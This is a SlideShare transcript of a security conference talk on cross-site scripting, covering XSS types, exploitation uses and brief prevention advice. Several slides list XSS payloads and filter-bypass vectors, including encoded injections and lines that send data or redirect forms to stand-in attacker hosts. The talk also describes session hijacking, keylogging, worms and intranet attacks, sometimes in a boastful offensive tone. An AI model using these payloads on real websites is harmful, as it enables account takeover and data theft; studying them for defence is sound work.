Your SlideShare is downloading. ×
  • Like
Xss is more than a simple threat
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Now you can save presentations on your phone or tablet

Available for both IPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Xss is more than a simple threat

  • 6,652 views
Published

XSS is more than you can imagine. You should take a look.

XSS is more than you can imagine. You should take a look.

Published in Education
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
6,652
On SlideShare
0
From Embeds
0
Number of Embeds
6

Actions

Shares
Downloads
201
Comments
0
Likes
5

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. XSS is more than a simple threat
    • Avădănei Andrei
    • Software Developer, Blogger, Student
    • www.worldit.info
    • @AndreiAvadanei
    • [email_address]
    • #RoCyberCon @20 february
  • 2. Introduction to XSS
    • Short story
    • XSS types
    • Shouts
  • 3. Short story
    • XSS
    • - it's a client side vulnerability
    • - … but can become a server side one
    • - based on Javascript injection
    • - … and HTML, Java, ActiveX, VBScript, Flash, JSON and so on
    • - is the second most popular threat in 2010 (via Infosec & OWASP)
    • - with many resources available on the Internet (use Google)
  • 4. XSS Types
    • Non-persistent (reflected)
    • - the most common type of XSS injection
    • - requires server side interpretation of the query
    • - third-party required
    • Persistent (stored)
    • - the most dangerous type of XSS injection
    • - requires server side interpretation of the query and data storing
    • - third-party may not be required
    • Dom-based
    • - the newest type of XSS injection
    • - requires client side interpretation
    • - usually non-persistent
  • 5. Shouts #1 – XSS Amazon
  • 6. Shouts #2 XSS Facebook
  • 7. Shouts #3 XSS Google
  • 8. Shouts #4 XSS Ebay
  • 9. Shouts #5 More XSS 'ed
    • Twitter, MySpace, Hi5, Wordpress, Yahoo, Joomla, PhpBB, Drupal, e107, WorldIT.info , PHP-Nuke, PHP-Fusion, *.edu, *.gov, NASA, Youtube, Blogspot, Symantec, Kaspersky, NOD32, browser plugins etc. etc. etc. etc.
  • 10. Getting XSS 'ed
    • Where?
    • Basic XSS'ing
    • Advanced XSS'ing
    • HTML 5 XSS'ed
    • Bypass XSS protection
  • 11. Where? everywhere
    • Rule : ” Do not trust in anything ever, especially when it comes to user input. ”
    • XSS vulnerabilities can be found in anything that came from user.
    • GET, POST, COOKIE, FILES, SERVER and Headers are main targets.
    • Try to be clever.
  • 12. Basic XSS 'ing
    • <script>alert(1)</script> //basic
    • “ ><script>alert(1)</script> //bypass a open tag
    • <!--<img src=&quot;--><img src=x onerror=alert(1)//&quot;> //bypass & generate a error
    • “ onmouseover=”alert(1)” //all javascript events
    • alert(/XSS/.source) or alert( String(/Test/).substr(1,4) ); //some other simple vectors
    • <script>alert(String.fromCharCode(88,83,83));</script> //bypass quotes filters
    • <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> //unicode injection; utf-8, hex, decimal or octal injection may work
    • <meta http-equiv=&quot;refresh&quot; content=&quot;0;url=http://;javascript:...&quot; // evasion
    • <style type=text/javascript>alert('xss')</style> //javascript injection based on style tag
    • “ ><img src=”x:x” onerror=”alert(0)”> // :D
    • […]
  • 13. Advanced XSS 'ing
    • <META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url= data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K &quot;>
    • <META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL= javascript:alert('XSS ');&quot;>
    • <DIV STYLE=&quot;background-image:00750072006C0028'006a006100760061007300630072006900700074003a0061006c0065007200740028.10270058.1053005300270029'0029&quot;> //background & unicode
    • exp/*<A STYLE='noxss:noxss(&quot;*//*&quot;);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))'> //send IE into a loop
    • <XML ID=&quot;xss&quot;><I><B>&lt;IMG SRC=&quot;javas<!-- -->cript:alert('XSS')&quot;&gt;</B></I></XML><SPAN DATASRC=&quot;#xss&quot; DATAFLD=&quot;B&quot; DATAFORMATAS=&quot;HTML&quot;></SPAN> //xss in xml document
    • x='x61x6cx65x72x74x28x31x29'; new Function(x)(); //something different from every day injections
    • Function('ax6cert(1)')(); // ;)
    • x=eval,1,1,1;1; 1,1,1,b='',1,1,1; 1,1,1,s=''',1,1,1;1,1,1,o='0',1,1,1; x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) ); //eval + unicode injection
    • [...]
  • 14. HTML 5 XSS 'ed
    • - new technologies, new problems
    • <video onerror=” javascript:alert(1 )”><source> //new tag
    • <audio onerror=”javascript:alert(1)”><source> //other new tag
    • <form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X //new events
    • <div draggable=”true” ondragstart=”event.dataTransfer.setData('text/plain', ' Evil payload ')”> <h3>DRAG ME!!</h3> </div> //new functions, events & attributes
    • <input type=&quot;text&quot; AUTOFOCUS onfocus=alert(1)>
    • <script>alert(localStorage.getItem('foo'))</script> //access local storage
    • “ ><script>(history.pushState({},”,'index.php'))(document.forms[0].action=' http://maliciousURL ')</script> //conceal the real location and replace it with anything we want. Ex : http://bit.ly/pushStateXSS
  • 15. Bypass XSS protection
    • <img/src=&quot;mars.png&quot;alt=&quot;mars&quot;> //no white spaces, use / instead
    • <object data=&quot; javascript:alert(0 )&quot;> //avoid src
    • <isindex type=image src=1 onerror=alert(1)> //did you know isindex tag?
    • <img src=x:alert(alt) onerror=eval(src) alt=0> //another bypass for error generation
    • location=location.hash.slice(1); //avoid the #
    • http://victim.com?param=&quot;;location=location.hash)//#0={};alert(0) //payload after the hash url, victim won't see true payload
    • alert(document.cookie) or alert(document['cookie']) or with(document)alert(cookie) //same results
    • &quot;&quot;+{toString:alert} or &quot;&quot;+{valueOf:alert} //Executes function without using () or =
    • Future tricks in HTML 5
    • </a onmousemove=&quot;alert(1)&quot;> //html 5 will support events in closed tags
    • <style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style> //pure xss-based XSS
    • data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg == //avoid using plain text/html value
    • ?injection=<script+&injection=>alert(1)></script> //HPP, popular in SQLi
            • via BlackHat Conferences.
  • 16. XSS Injection Exploitation (part 1)
    • Redirection
    • Clickjacking
    • URL Spoofing
    • Session hijacking
    • Cookie stuffing
    • Ad Hijacking
    • CSRF/XSRF attacks
    • History stealling
    • XSS Defacement
    • Key & Mouse logging
  • 17. Redirection & Clickjacking
    • Redirection
    • redirect your victim, ex. document.location = ”http://www.your-evil-site.com”;
    • you create fake traffic
    • popular
    • Clickjacking
    • describes one websites that poses as another.
    • ex. : redirect victim to you onclick event calling
    • used in phishing, gives high credibility
    • extremely popular
  • 18. URL Spoofing
    • popular in phishing
    • the url is user friendly
    • the web page content is hijacked and all information are send to monitored websites by a thief
    • extremely popular
  • 19. Session Hijacking
    • also known as ”Cookie Stealling”
    • usually used with document.cookie
    • help you to gain control over other logged session
    • needs a cookie grabber
    • for instance, XSS in *.yahoo.com can help you to hijack Yahoo accounts
    • extremely popular
  • 20. Cookie stuffing
    • also known as cookie dropping
    • used in blackhat online marketing
    • generates illegitimate affiliate sellings by hijacking cookies
    • uses pop-ups, frames and iframes, images, javascript, stylesheets or flash for accomplishing cookie dropping
    • popular
  • 21. Ad Hijacking
    • used in blackhat online marketing
    • usually requires persistent XSS
    • you can modify ad scripts with your own, getting paid when user clicks on hijacked ads
    • popular
  • 22. CSRF/XSRF attacks
    • unauthorized commands are transmited from an user that website trusts.
    • usually used along with <img src=””.
    • for instance, if <img src=” http://victim.com/?do=logout ” /> is permanently injected and an user acces the page with malformated content, he will be forced to log out.
    • use your imagination, you can do more than that.
  • 23. History Stealling
    • You can find out what sites have been visited by the victim using ” getComputedStyle ” like bellow, after you createad a node with CSS visited selector having a custom known color :
    • document.defaultView.getComputedStyle( link , null).getPropertyValue(&quot;color&quot;);
    • rarely used, but still important
    • it could be done using the full power of HTML 5
  • 24. XSS Defacement
    • looks like server side defaced pages
    • … but it's only a client side deface
    • can create chaos and confusion when they are used for hacking an website
    • invoves changing the HTML content of the page
    • of course, two types : persistent and non-persistent
    • persistent XSS deface are more dangerous than no-persistent
  • 25. Key & Mouse Logging
    • Keylogging
    • - log all keystrokes and send remotely
    • - document.onkeypress / unsafeWindow.onkeypress events
    • - store keystrokes on a local variable and send them regular on a remote server
    • Mouse logging
    • - log all mouse moves and send remotely
    • - document.onmousemove event
    • - dangerous but not so popular
    • 0
  • 26. Tired?
    • You shouldn't, because this is only the beggining...
  • 27. XSS Injection Exploitation (part 2)
    • Browser hijacking
    • Port Scanning
    • DDoS
    • XSS Tunneling
    • Distributed Password Cracking
    • Worms (Spreading)
    • Arbitrary file execution & Privilege escalation
    • Intranet Hacking
  • 28. Browser Hijacking
    • Also known as Tab Hijacking .
    • Highly recommended when hacker want a second shot on victims.
    • XSS Shells usually do for you
    • With iframe injection
    • Working until the victim close the tab.
    • The only drawback with this method is that the URL bar does not change with each click, which may or may not be noticeable to the user.
  • 29. Distributed port scanning
    • Cross domain XMLHttpRequests and WebSockets for performing remote port scanning, but using XSS you can do distributed remote port scanning
    • Latest Firefox, Chrome or Safari supports already these new technolologies
    • This option it's not available yet but it will in the next generation of XSS Shell
    • Firefox & Safari time connection is less than 100 ms
    • 1 victim – 65,000 scanned ports – 6,500 seconds
    • 100 victims - 65,000 scanned ports – 6,5 seconds
    • What about 1,000 or 10,000 victims?
  • 30. DDoS
    • Based on WebSockets
    • Application-level DDoS attacks (layer 7 DDoS)
    • Cross Origin Request (COR) are processed even if the site has restriction and therefore the request will create a load on the server
    • 1 minute – 1 browser – 10,000 requests / minute using COR WebWorkers with GET requests
    • 1 minute – 600 browser – over 100, 000 requests / minute can be enought to shut down a target
    • We should wait for upgrading the majority of the browsers in the world
    • But blackhat teams will be prepared with amazing tools for DDoS
  • 31. XSS Tunneling
    • XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack.
    • At technical level, it may be an Ajax application. Node.js and Comet Push can make difference in the future XSS Shells.
    • XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies.
    • XSS Tunnel is the standard HTTP proxy which sits on an attacker’s system.
    • You can tunnel all your traffic throught a XSS Channel.
    • You can build your own SSH-like protocol.
    • You can forget about the user session problem when hijacking is not possible because there is an IP adress restriction.
    • Again, your imagination is the limit.
  • 32. Distributed Password Cracking
    • Javascript engines are becoming verry fast.
    • And we have WebWorkers.
    • Password guessing rates in Javascript tools of 100,000 MD5 hashes/second .
    • ~100 machines running the JavaScript distributed password cracking program can match the cracking rate of one machine running a similar program written in native code.
    • But, in these days spreading methods are verry effective. Why not 10,000 compromised machines?
    • Ravan - a JavaScript distributed password cracker that uses HTML5 WebWorkers.
    • Perform password cracking in background JavaScript threads.
    • Support salted MD5 and SHA hashes.
  • 33. Worms (spreading)
    • One of the most efficient environment for worm propagation - social networking
    • XSS Warhol Worm
    • Linear XSS Worm
    • Hydra XSS Worm
    • Samy (2005) inffected over 1,000,000 users from MySace in 20 hours
    • Yahoo!, Hi5, Twitter and Facebook could easily be next targets on a larger scale.
    • You can simply attach a trojan with your Worm and the risks of creating permanent zombies are growing.
  • 34. Arbitrary file execution
    • In 2008 a vulnerability which affected the IE 7 & IE 8 could execute some arbitrary files using some social engineering skills.
    • During last years few other similar vulnerabilities appeard on Internet jungle.
    • Still, a XSS vulnerability and a CSRF vulnerability in a administrator file editor, which can be bypassed with XMLHttpRequest to the same origin requests an you have the right combination : a XSS vulnerability has become arbitrary code execution ( privilege escalation ).
    • What are you waiting for? Find the next one major privilege escalation vulnerability.
  • 35. Intranet Hacking (part 1)
    • Web browsers can be completely controlled by any Web page, enabling them to become launching points to attack internal network resources. Why?
  • 36. Intranet Hacking (part 2)
    • Exploit procedures :
    • A victim visits a malicious Web page or clicks a nefarious link; embedded JavaScript malware then assumes control over their Web browser.
    • JavaScript malware loads a Java applet revealing the victim’s internal NAT IP address.
    • Then, using the victim’s Web browser as an attack platform, the JavaScript malware identifies and fingerprints Web servers on the internal network.
    • Attacks are initiated against internal or external Web sites, and compromised information is sent outside the network for collection.
  • 37. Intranet Hacking (part 3)
    • Collecting information :
    • Obtaining NAT'ed IP Adress – MyAddress, a special Java Applet
    • Port scanning - <script src= http://ip/ ></script>
    • Blind Web Server Fingerprinting - explore the use of unique image URLs, CSS or JavaScript files to perform fingerprinting.
      • <img src=&quot;http://intranet_ip/unique_image_url&quot; onerror=&quot;fingerprint()&quot; />
    • Attack the intranet
      • - try different well-known vulnerabilities
      • - try hacking the web interface of DSL routers
      • - load local files using file:///
      • - get help from XSS Shells
  • 38. Preventing XSS attacks
    • Filtering
    • Input / Output encoding
    • Web browser security
      • - select a safer browser (Chrome)
      • - use a virtual machine for suspicious links
      • - pay more attention to shortened urls
      • - use plugins for better security (like NoScript)
  • 39. XSS it's still a simple threat?
    • :)
  • 40. Question?
    • Thanks. :)
  • 41. Bibliography
    • Experience & Google.